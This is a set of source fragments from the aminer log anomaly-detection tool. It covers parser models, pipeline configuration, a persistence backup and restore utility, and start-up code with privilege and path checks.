DecimalIntegerValueModelElement("obytes"), FixedDataModelElement("s7", b" , REPLY: SRC="), IpAddressDataModelElement("rsrcip"), FixedDataModelElement("s8", b" DST="), IpAddressDataModelElement("rdstip"), FixedDataModelElement("s9", b" PROTO="), FixedWordlistDataModelElement("rproto", [b"TCP", b"UDP"]), FixedDataModelElement("s10", b" SPT="), DecimalIntegerValueModelElement("rspt"), FixedDataModelElement("s11", b" DPT="), DecimalIntegerValueModelElement("rdpt"), FixedDataModelElement("s12", b" PKTS="), 
DecimalIntegerValueModelElement("rpkts"), FixedDataModelElement("s13", b" BYTES="), DecimalIntegerValueModelElement("rbytes"), # No additional whitespace from Ubuntu Trusty 14.04 on. OptionalMatchModelElement("tail", FixedDataModelElement("s0", b" ")) ]), FixedDataModelElement("nfct-plugin", b"NFCT plugin working in event mode"), FixedDataModelElement("reopen", b"reopening capture file"), FixedDataModelElement("signal", b"signal received, calling pluginstances"), FixedDataModelElement("uidchange", b"Changing UID / GID"), SequenceModelElement("seq", [ FixedDataModelElement("s0", b"id=\""), DecimalIntegerValueModelElement("id"), FixedDataModelElement("s1", b"\" severity=\""), DelimitedDataModelElement("severity", b"\""), FixedDataModelElement("s2", b"\" sys=\""), DelimitedDataModelElement("sys", b"\""), FixedDataModelElement("s3", b"\" sub=\""), DelimitedDataModelElement("sub", b"\""), FixedDataModelElement("s4", b"\" name=\""), DelimitedDataModelElement("name", b"\""), FixedDataModelElement("s5", b"\" action=\""), DelimitedDataModelElement("action", b"\""), FixedDataModelElement("s6", b"\" fwrule=\""), DelimitedDataModelElement("fwrule", b"\""), FixedDataModelElement("s7", b"\" initf=\""), DelimitedDataModelElement("initf", b"\""), FixedDataModelElement("s8", b"\" srcmac=\""), DelimitedDataModelElement("srcmac", b"\""), FixedDataModelElement("s9", b"\" dstmac=\""), DelimitedDataModelElement("dstmac", b"\""), FixedDataModelElement("s10", b"\" srcip=\""), DelimitedDataModelElement("srcip", b"\""), FixedDataModelElement("s11", b"\" dstip=\""), DelimitedDataModelElement("dstip", b"\""), FixedDataModelElement("s12", b"\" proto=\""), DelimitedDataModelElement("proto", b"\""), FixedDataModelElement("s13", b"\" length=\""), DelimitedDataModelElement("length", b"\""), FixedDataModelElement("s14", b"\" tos=\""), DelimitedDataModelElement("tos", b"\""), FixedDataModelElement("s15", b"\" prec=\""), DelimitedDataModelElement("prec", b"\""), FixedDataModelElement("s16", b"\" 
This directory contains the files enabled for inclusion in the analysis pipeline configuration. They are made importable by adding this directory to the Python module search path of the aminer tools. If you object to exposing every Python site package installed on this host to a process running with elevated privileges, you can instead make only the components you need available by placing symlinks to them here, e.g. ln -s /usr/lib/python3.6/dist-packages/pytz conf-enabled/pytz
def build_analysis_pipeline(analysis_context):
    """
    Define the function to create pipeline for parsing the log data.

    It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create
    log atoms from them. Everything is wired into analysis_context: its atomizer_factory is assigned and each
    detector is registered as a component. The module-level learn_mode flag is passed to every detector.
    """
    from aminer.parsing.SequenceModelElement import SequenceModelElement
    import ApacheAccessModel
    from aminer.analysis import AtomFilters
    from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory
    from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler
    from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
    from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector
    from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector
    from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler

    # Parsing model: the Apache access log model wrapped in a root sequence named 'model'.
    parsing_model = SequenceModelElement('model', [ApacheAccessModel.get_model()])

    # Shared handler containers. The very same list object is handed to the atomizer factory and to every
    # detector, which is why the StreamPrinterEventHandler appended at the very end is seen by all of them.
    anomaly_event_handlers = []
    atom_filter = AtomFilters.SubhandlerFilter(None)

    # A simple line based atomizer is usually sufficient.
    analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(
        parsing_model, [atom_filter], anomaly_event_handlers, default_timestamp_path_list='/model/accesslog/time')

    # Just report all unparsed atoms to the event handlers (stop_when_handled_flag: judging by its name,
    # later handlers do not see an atom this one handled).
    atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), stop_when_handled_flag=True)

    config = analysis_context.aminer_config
    detector_factories = [
        # Report parser paths never seen before.
        lambda: NewMatchPathDetector(config, anomaly_event_handlers, learn_mode=learn_mode),
        # Check if status-code changed
        lambda: NewMatchPathValueDetector(
            config, ["/model/accesslog/status"], anomaly_event_handlers, learn_mode=learn_mode),
        # Check if HTTP-Method for a HTTP-Request has changed
        lambda: NewMatchPathValueComboDetector(
            config, ["/model/accesslog/request", "/model/accesslog/method"], anomaly_event_handlers,
            learn_mode=learn_mode),
        # Check if HTTP-Statuscode for a HTTP-Request has changed
        lambda: NewMatchPathValueComboDetector(
            config, ["/model/accesslog/request", "/model/accesslog/status"], anomaly_event_handlers,
            learn_mode=learn_mode),
    ]
    # Construct, register and attach one detector at a time, in the order listed above.
    for make_detector in detector_factories:
        detector = make_detector()
        analysis_context.register_component(detector, component_name=None)
        atom_filter.add_handler(detector)

    # Add stdout stream printing for debugging, tuning.
    anomaly_event_handlers.append(StreamPrinterEventHandler(analysis_context))
Defaults to 0 (any # event can immediately trigger alerting). # MailAlerting.AlertGraceTime: 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. # MailAlerting.EventCollectTime: 10 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. # MailAlerting.MinAlertGap: 600 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. # MailAlerting.MaxAlertGap: 600 # Define how many events should be included in one alert mail # at most. 
This defaults to 1000 # MailAlerting.MaxEventsPerMessage: 1000 # Configure the logline prefix # LogPrefix: '' ######################################################### # #Parser: # - id: 'timeModel' # type: DateTimeModelElement # name: 'time' # args: '%Y-%m-%dT%H:%M:%S.%f' # # - id: 'hostModel' # type: VariableByteDataModelElement # name: 'host' # args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' # # - id: 'reqMethodModel' # type: FixedWordlistDataModelElement # name: 'method' # args: # - 'GET' # - 'POST' # - 'PUT' # - 'HEAD' # - id: 'apacheModel' # type: ApacheAccessModel # name: 'apache' # args: 'apache' # # - id: 'START' # start: True # type: SequenceModelElement # name: 'model' # args: # - timeModel # - hostModel # - reqMethodModel # - apacheModel Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'startModel' start: True type: SequenceModelElement name: 'model' args: - apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: "NewMatchPathValueDetector" paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: false learn_mode: true - type: "NewMatchPathValueComboDetector" paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: true persistence_id: 'accesslog_request' # optional default: Default output_logline: false allow_missing_values: false # optional default: false - type: "NewMatchPathValueComboDetector" paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: true EventHandlers: - id: "stpe" json: true # optional default: false type: "StreamPrinterEventHandler" - id: "syslog" type: "SyslogWriterEventHandler" 
# stdout/stderr go to a dedicated file rather than to syslog/journal: if aminer is
# misconfigured to read its own log output (e.g. /var/log/aminer.log listed in
# LogResourceList), it may detect anomalies in its own log data, creating a logging
# loop. You may prefer logging to journal only, which needs journald to be
# reconfigured with "ForwardToSyslog=false".
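RC_RESPONSE_PREFIX = 'Remote execution response: '


def _remote_control(expression):
    """
    Run the given expression inside the live aminer via aminerremotecontrol and return its reply text.

    The command is passed as an argument list, so no shell is involved; the expression is one of the fixed
    strings chosen in this file, never user input. The reply prefix printed by aminerremotecontrol is removed
    as a prefix: the original code used str.strip() with the prefix as a character *set*, which also chewed
    matching characters off the end of the reply (e.g. a reply "None" became "Non").
    """
    import subprocess
    completed = subprocess.run(['sudo', 'aminerremotecontrol', '--exec', expression],
                               stdout=subprocess.PIPE, universal_newlines=True, check=False)
    if completed.returncode != 0:
        print(f"aminerremotecontrol exited with status {completed.returncode}", file=sys.stderr)
    reply = completed.stdout.strip('\n')
    if reply.startswith(RC_RESPONSE_PREFIX):
        reply = reply[len(RC_RESPONSE_PREFIX):]
    return reply


def _check_restore_args(args):
    """Validate the --restore related arguments, exiting with status 1 on the first problem."""
    if not args.restore.startswith('/'):
        print('The restore path must be absolute.', file=sys.stderr)
        sys.exit(1)
    # -u/-g/-p are optional. The original evaluated "'.' in args.user" (and the equivalents for group and
    # persistence dir) even when the flag was absent, which raised TypeError/AttributeError on None instead
    # of falling back to the configuration file.
    if args.user is not None and ('.' in args.user or '/' in args.user):
        print(f"The aminer user {args.user} must not contain any . or /", file=sys.stderr)
        sys.exit(1)
    if args.group is not None and ('.' in args.group or '/' in args.group):
        print(f"The aminer group {args.group} must not contain any . or /", file=sys.stderr)
        sys.exit(1)
    if args.persistence_dir is not None and not args.persistence_dir.startswith('/'):
        print('The persistence_dir path must be absolute.', file=sys.stderr)
        sys.exit(1)


def _resolve_restore_target(args):
    """
    Return (user, group, persistence_dir) the backup is restored into.

    Explicit -u/-g/-p win; values still missing are taken from --config when given, and finally from the
    packaged defaults (aminer:aminer, /var/lib/aminer). The original discarded explicit flags whenever
    --config was absent.
    """
    user, group, persistence_dir = args.user, args.group, args.persistence_dir
    if args.config is not None:
        aminer_config = load_config(args.config)
        if user is None:
            user = aminer_config.config_properties[KEY_AMINER_USER]
        if group is None:
            group = aminer_config.config_properties[KEY_AMINER_GROUP]
        if persistence_dir is None:
            persistence_dir = aminer_config.config_properties[KEY_PERSISTENCE_DIR]
    if user is None:
        user = 'aminer'
    if group is None:
        group = 'aminer'
    if persistence_dir is None:
        persistence_dir = '/var/lib/aminer'
    return user, group, persistence_dir


def _restore(args):
    """Replace the content of the persistence directory with the backup named by --restore."""
    _check_restore_args(args)
    backup_path = args.restore
    aminer_user, aminer_grp, persistence_dir = _resolve_restore_target(args)
    if not os.path.exists(backup_path):
        print(f"{backup_path} does not exist.", file=sys.stderr)
        sys.exit(1)  # was a silent exit status 0, invisible to calling scripts
    from pwd import getpwnam
    from grp import getgrnam
    # Resolve the ids before touching the persistence dir, so an unknown user/group cannot leave it wiped.
    child_user_id = getpwnam(aminer_user).pw_uid
    child_group_id = getgrnam(aminer_grp).gr_gid
    # NOTE(review): clear_persistence() runs before copytree(); if the copy fails the live persistence is
    # already gone. Copying into a sibling directory and swapping would be safer — confirm what
    # PersistenceUtil.copytree does with symlinks and partial failures before changing this.
    clear_persistence(persistence_dir)
    copytree(backup_path, persistence_dir)
    # lchown: change ownership of the entries themselves, never of a symlink's target. Following symlinks
    # here (os.chown's default) would hand ownership of arbitrary files to the aminer user should the
    # restored tree contain a symlink pointing outside the persistence dir.
    for dirpath, _dirnames, filenames in os.walk(persistence_dir):
        os.lchown(dirpath, child_user_id, child_group_id)
        for filename in filenames:
            os.lchown(os.path.join(dirpath, filename), child_user_id, child_group_id)
    print(f"Restored persistence from {backup_path} successfully.")


def main():
    """
    Run the aminer-persistence program.

    The three actions can be combined and are carried out in this order:
      --list     ask the running aminer (via aminerremotecontrol) for its existing backups,
      --backup   ask the running aminer to create a backup,
      --restore  copy a backup directory into the persistence directory and hand it over to the aminer
                 user/group (the chown step needs sufficient privileges).
    Exits with status 1 on an invalid program name or invalid --restore arguments.
    """
    # Extract program name, but only when sure to contain no problematic characters.
    program_name = sys.argv[0].split('/')[-1]
    if (program_name == '.') or (program_name == '..') or (re.match('^[a-zA-Z0-9._-]+$', program_name) is None):
        print('Invalid program name, check your execution args', file=sys.stderr)
        sys.exit(1)

    help_message = 'aminer-persistence\n'
    if supports_color():
        help_message += colflame
    else:
        help_message += flame
    help_message += 'For further information read the man pages running "man aminerRemoteControl".'
    parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('-v', '--version', action='version', version=__version_string__)
    parser.add_argument('-c', '--config', type=str, help='path to the config-file')
    parser.add_argument('-l', '--list', action='store_true', help='list all existing backups')
    parser.add_argument('-b', '--backup', action='store_true', help='create a backup with the current datetime')
    parser.add_argument('-r', '--restore', type=str, help='restore a persistence backup')
    parser.add_argument('-u', '--user', type=str, help='set the aminer user. Only used with --restore')
    parser.add_argument('-g', '--group', type=str, help='set the aminer group. Only used with --restore')
    parser.add_argument('-p', '--persistence-dir', type=str, help='set the persistence directory. Only used with --restore')

    args = parser.parse_args()

    if args.list:
        print(_remote_control('list_backups(analysis_context)'))
    if args.backup:
        print(_remote_control('create_backup(analysis_context)'))
    if args.restore is not None:
        _restore(args)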
This is required to allow the aminer parent parent process to reopen log files, which might need the elevated privileges. NOTE: This tool is developed to allow secure operation even in hostile environment, e.g. when one directory, where aminer attempts to open logfiles is already under full control of an attacker. However it is not intended to be run as SUID-binary, this would require code changes to protect also against standard SUID attacks. Parameters: * --config [file]: Location of configuration file, defaults to '/etc/aminer/config.py' when not set. * --run-analysis: This parameters is NOT intended to be used on command line when starting aminer, it will trigger execution of the unprivileged aminer background child performing the real analysis. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import errno import os import re import socket import time import sys import logging import shutil import warnings import argparse import stat import tempfile import ast from pwd import getpwnam from grp import getgrnam from logging.handlers import RotatingFileHandler # As site packages are not included, define from where we need to execute code before loading it. 
sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] import aminer.AminerConfig as AminerConfig # skipcq: FLK-E402 from aminer.util.StringUtil import colflame, flame, supports_color, decode_string_as_byte_string # skipcq: FLK-E402 from aminer.util.PersistenceUtil import clear_persistence, copytree # skipcq: FLK-E402 from aminer.util import SecureOSFunctions # skipcq: FLK-E402 from aminer.AnalysisChild import AnalysisChild # skipcq: FLK-E402 from aminer.input.LogStream import FileLogDataResource, UnixSocketLogDataResource # skipcq: FLK-E402 from metadata import __version_string__, __version__ # skipcq: FLK-E402 child_termination_triggered_flag = False offline_mode = False def run_analysis_child(aminer_config, program_name): """Run the Analysis Child.""" # Verify existence and ownership of persistence directory. logging.getLogger(AminerConfig.REMOTE_CONTROL_LOG_NAME).info('aminer started.') logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info('aminer started.') persistence_dir_name = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir_name, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) stat_result = os.fstat(persistence_dir_fd) if ((not stat.S_ISDIR(stat_result.st_mode)) or ((stat_result.st_mode & stat.S_IRWXU) != 0o700) or ( stat_result.st_uid != os.getuid()) or (stat_result.st_gid != os.getgid())): msg = f"FATAL: persistence directory \"{repr(persistence_dir_name)}\" has to be owned by analysis process (uid " \ f"{stat_result.st_uid}!={os.getuid()}, gid {stat_result.st_gid}!={os.getgid()}) and have access mode 0700 only!" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).critical(msg) sys.exit(1) import posix1e # O_PATH is problematic when checking ACL. However it is possible to check the ACL using the file name. 
try: if posix1e.has_extended(persistence_dir_name): msg = f"WARNING: SECURITY: Extended POSIX ACLs are set in {persistence_dir_name.decode()}, but not supported by the aminer. " \ f"Backdoor access could be possible." print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) except OSError: # system does not support POSIX ACLs. pass child = AnalysisChild(program_name, aminer_config) child.offline_mode = offline_mode # This function call will only return on error or signal induced normal termination. child_return_status = child.run_analysis(3) if child_return_status == 0: sys.exit(0) msg = f"{program_name}: run_analysis terminated with unexpected status {child_return_status}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) def initialize_loggers(aminer_config, aminer_user_id, aminer_grp_id): """Initialize all loggers.""" datefmt = '%d/%b/%Y:%H:%M:%S %z' log_dir = aminer_config.config_properties.get(AminerConfig.KEY_LOG_DIR, AminerConfig.DEFAULT_LOG_DIR) if log_dir == AminerConfig.DEFAULT_LOG_DIR: try: if not os.path.isdir(log_dir): persistence_dir_path = aminer_config.config_properties.get( AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory( persistence_dir_path, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) if SecureOSFunctions.base_dir_path.decode() == AminerConfig.DEFAULT_PERSISTENCE_DIR: relative_path_log_dir = os.path.split(AminerConfig.DEFAULT_LOG_DIR)[1] os.mkdir(relative_path_log_dir, dir_fd=persistence_dir_fd) os.chown(relative_path_log_dir, aminer_user_id, aminer_grp_id, dir_fd=persistence_dir_fd, follow_symlinks=False) except OSError as e: if e.errno != errno.EEXIST: msg = 'Unable to create log-directory: %s' % log_dir else: msg = e logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg.strip('\n')) print(msg, file=sys.stderr) tmp_value = 
aminer_config.config_properties.get(AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_STAT_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_STAT_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_DEBUG_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_DEBUG_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) max_bytes = aminer_config.config_properties.get(AminerConfig.KEY_LOG_ROTATION_MAX_BYTES, AminerConfig.DEFAULT_LOG_ROTATION_MAX_BYTES) backup_count = aminer_config.config_properties.get( AminerConfig.KEY_LOG_ROTATION_BACKUP_COUNT, AminerConfig.DEFAULT_LOG_ROTATION_BACKUP_COUNT) log_dir_fd = SecureOSFunctions.secure_open_log_directory(log_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) rc_logger = logging.getLogger(AminerConfig.REMOTE_CONTROL_LOG_NAME) rc_logger.setLevel(logging.DEBUG) remote_control_log_file = aminer_config.config_properties.get( AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_REMOTE_CONTROL_LOG_FILE)) if not remote_control_log_file.startswith(log_dir): remote_control_log_file = os.path.join(log_dir, remote_control_log_file) try: rc_file_handler = RotatingFileHandler(remote_control_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(remote_control_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {remote_control_log_file}: {e}. 
Stopping..", file=sys.stderr) sys.exit(1) rc_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) rc_logger.addHandler(rc_file_handler) logging.addLevelName(15, "REMOTECONTROL") stat_logger = logging.getLogger(AminerConfig.STAT_LOG_NAME) stat_logger.setLevel(logging.INFO) stat_log_file = aminer_config.config_properties.get( AminerConfig.KEY_STAT_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_STAT_LOG_FILE)) if not stat_log_file.startswith(log_dir): stat_log_file = os.path.join(log_dir, stat_log_file) try: stat_file_handler = RotatingFileHandler(stat_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(stat_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {stat_log_file}: {e}. Stopping..", file=sys.stderr) sys.exit(1) stat_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(message)s', datefmt=datefmt)) stat_logger.addHandler(stat_file_handler) debug_logger = logging.getLogger(AminerConfig.DEBUG_LOG_NAME) if AminerConfig.DEBUG_LEVEL == 0: debug_logger.setLevel(logging.ERROR) elif AminerConfig.DEBUG_LEVEL == 1: debug_logger.setLevel(logging.INFO) else: debug_logger.setLevel(logging.DEBUG) debug_log_file = aminer_config.config_properties.get( AminerConfig.KEY_DEBUG_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_DEBUG_LOG_FILE)) if not debug_log_file.startswith(log_dir): debug_log_file = os.path.join(log_dir, debug_log_file) try: debug_file_handler = RotatingFileHandler(debug_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(debug_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {debug_log_file}: {e}. 
Stopping..", file=sys.stderr) sys.exit(1) debug_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) debug_logger.addHandler(debug_file_handler) def parse_var(s): """ Parse a key, value pair, separated by "=". That's the reverse of ShellArgs. On the command line (argparse) a declaration will typically look like: foo=hello or foo="hello world" """ items = s.split("=") key = items[0].strip() # we remove blanks around keys, as is logical if len(items) > 1: # rejoin the rest: value = "=".join(items[1:]) return key, value def parse_vars(items): """Parse a series of key-value pairs and return a dictionary.""" d = {} if items: for item in items: key, value = parse_var(item) d[key] = value return d def main(): """Run the aminer main program.""" # Extract program name, but only when sure to contain no problematic characters. warnings.filterwarnings('ignore', category=ImportWarning) program_name = sys.argv[0].split('/')[-1] if (program_name == '.') or (program_name == '..') or (re.match('^[a-zA-Z0-9._-]+$', program_name) is None): print('Invalid program name, check your execution args', file=sys.stderr) sys.exit(1) # We will not read stdin from here on, so get rid of it immediately, thus aberrant child cannot manipulate caller's stdin using it. 
stdin_fd = os.open('/dev/null', os.O_RDONLY) os.dup2(stdin_fd, 0) os.close(stdin_fd) help_message = 'aminer - logdata-anomaly-miner\n' if supports_color(): help_message += colflame else: help_message += flame parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-v', '--version', action='version', version=__version_string__) parser.add_argument('-u', '--check-updates', action='store_true', help='check if updates for the aminer are available.') parser.add_argument('-c', '--config', default='/etc/aminer/config.yml', type=str, help='path to the config-file') parser.add_argument('-D', '--daemon', action='store_false', help='run as a daemon process') parser.add_argument('-s', '--stat', choices=["0", "1", "2"], type=str, help='set the stat level. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for ' 'verbose statistics.') parser.add_argument('-d', '--debug', choices=["0", "1", "2"], type=str, help='set the debug level. Possible debug-levels are 0 for no debugging, 1 for normal output (INFO and above), 2 ' 'for printing all debug information.') parser.add_argument('--run-analysis', action='store_true', help='enable/disable analysis') parser.add_argument('-C', '--clear', action='store_true', help='removes all persistence directories') parser.add_argument('-r', '--remove', action='append', type=str, help='removes a specific persistence directory') parser.add_argument('-R', '--restore', type=str, help='restore a persistence backup') parser.add_argument('-f', '--from-begin', action='store_true', help='removes RepositioningData before starting the aminer') parser.add_argument('-o', '--offline-mode', action='store_true', help='stop the aminer after all logs have been processed.') parser.add_argument("--config-properties", metavar="KEY=VALUE", nargs='+', help="Set a number of config_properties by using key-value pairs (do not put spaces before or after the = sign). 
" "If a value contains spaces, you should define it with double quotes: 'foo=\"this is a sentence\". Note that " "values are always treated as strings. If values are already defined in the config_properties, the input " "types are converted to the ones already existing.") args = parser.parse_args() if args.check_updates: import urllib3 url = 'https://raw.githubusercontent.com/ait-aecid/logdata-anomaly-miner/main/source/root/usr/lib/logdata-anomaly-miner/metadata.py' http = urllib3.PoolManager() r = http.request('GET', url, preload_content=True) metadata = r.data.decode() http.clear() lines = metadata.split('\n') curr_version = None for line in lines: if '__version__ = ' in line: curr_version = line.split('__version__ = ')[1].strip('"') break if __version__ == curr_version: print(f"The current aminer version {curr_version} is installed.") else: print(f"A new aminer version exists ({curr_version}). Currently version {__version__} is installed.") print("Use git pull to update the aminer version.") sys.exit(0) config_file_name = args.config run_in_foreground_flag = args.daemon run_analysis_child_flag = args.run_analysis clear_persistence_flag = args.clear remove_persistence_dirs = args.remove from_begin_flag = args.from_begin global offline_mode # skipcq: PYL-W0603 offline_mode = args.offline_mode if args.restore is not None and ('.' in args.restore or '/' in args.restore): parser.error(f"The restore path {args.restore} must not contain any . or /") if args.remove is not None: for remove in args.remove: if '.' in remove or '/' in remove: parser.error(f"The remove path {remove} must not contain any . or /") restore_relative_persistence_path = args.restore stat_level = 1 debug_level = 1 stat_level_console_flag = False debug_level_console_flag = False if args.stat is not None: stat_level = int(args.stat) stat_level_console_flag = True if args.debug is not None: debug_level = int(args.debug) debug_level_console_flag = True # Load the main configuration file. 
if not os.path.exists(config_file_name): print(f"{program_name}: config \"{config_file_name}\" not (yet) available!", file=sys.stderr) sys.exit(1) # using the solution here to override config_properties: # https://stackoverflow.com/questions/27146262/create-variable-key-value-pairs-with-argparse-python use_temp_config = False config_properties = parse_vars(args.config_properties) if args.config_properties and "LearnMode" in config_properties: ymlext = [".YAML", ".YML", ".yaml", ".yml"] extension = os.path.splitext(config_file_name)[1] if extension in ymlext: use_temp_config = True fd, temp_config = tempfile.mkstemp(suffix=".yml") with open(config_file_name) as f: for line in f: if "LearnMode" in line: line = "LearnMode: %s" % config_properties["LearnMode"] os.write(fd, line.encode()) config_file_name = temp_config os.close(fd) else: msg = "The LearnMode parameter does not exist in .py configs!" print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) # Minimal import to avoid loading too much within the privileged process. try: aminer_config = AminerConfig.load_config(config_file_name) if use_temp_config: os.remove(config_file_name) config_file_name = args.config except ValueError: sys.exit(1) for config_property in config_properties: if config_property == "LearnMode": continue old_value = aminer_config.config_properties.get(config_property) value = config_properties[config_property] if old_value is not None: try: if isinstance(old_value, bool): if value == "True": value = True elif value == "False": value = False else: msg = f"The {config_property} parameter must be of type {type(old_value)}!" 
print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) elif isinstance(old_value, int): value = int(value) elif isinstance(old_value, float): value = float(value) elif isinstance(old_value, list): value = ast.literal_eval(value) except ValueError: msg = f"The {config_property} parameter must be of type {type(old_value)}!" print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) else: msg = f"The {config_property} parameter is not set in the config. It will be treated as a string!" print("WARNING: " + msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) aminer_config.config_properties[config_property] = value persistence_dir = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) child_user_name = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_USER) child_group_name = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_GROUP) child_user_id = -1 child_group_id = -1 try: if child_user_name is not None: child_user_id = getpwnam(child_user_name).pw_uid if child_group_name is not None: child_group_id = getgrnam(child_group_name).gr_gid except: # skipcq: FLK-E722 print(f"Failed to resolve {AminerConfig.KEY_AMINER_USER} or {AminerConfig.KEY_AMINER_GROUP}", file=sys.stderr) sys.exit(1) if not stat_level_console_flag and AminerConfig.KEY_LOG_STAT_LEVEL in aminer_config.config_properties: stat_level = aminer_config.config_properties[AminerConfig.KEY_LOG_STAT_LEVEL] if not debug_level_console_flag and AminerConfig.KEY_LOG_DEBUG_LEVEL in aminer_config.config_properties: debug_level = aminer_config.config_properties[AminerConfig.KEY_LOG_DEBUG_LEVEL] if AminerConfig.CONFIG_KEY_ENCODING in aminer_config.config_properties: AminerConfig.ENCODING = aminer_config.config_properties[AminerConfig.CONFIG_KEY_ENCODING] AminerConfig.STAT_LEVEL = stat_level AminerConfig.DEBUG_LEVEL = debug_level 
initialize_loggers(aminer_config, child_user_id, child_group_id) if restore_relative_persistence_path is not None and (clear_persistence_flag or remove_persistence_dirs): msg = 'The --restore parameter removes all persistence files. Do not use this parameter with --Clear or --Remove!' print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if clear_persistence_flag: if remove_persistence_dirs: msg = 'The --clear and --remove arguments must not be used together!' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) clear_persistence(persistence_dir) if remove_persistence_dirs: persistence_dir_name = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) for filename in os.listdir(persistence_dir_name): file_path = os.path.join(persistence_dir_name, filename) try: if not os.path.isdir(file_path): msg = 'The aminer persistence directory should not contain any files.' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) continue shutil.rmtree(file_path) except OSError as e: msg = f"Failed to delete {file_path}. Reason: {e}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) for filename in remove_persistence_dirs: 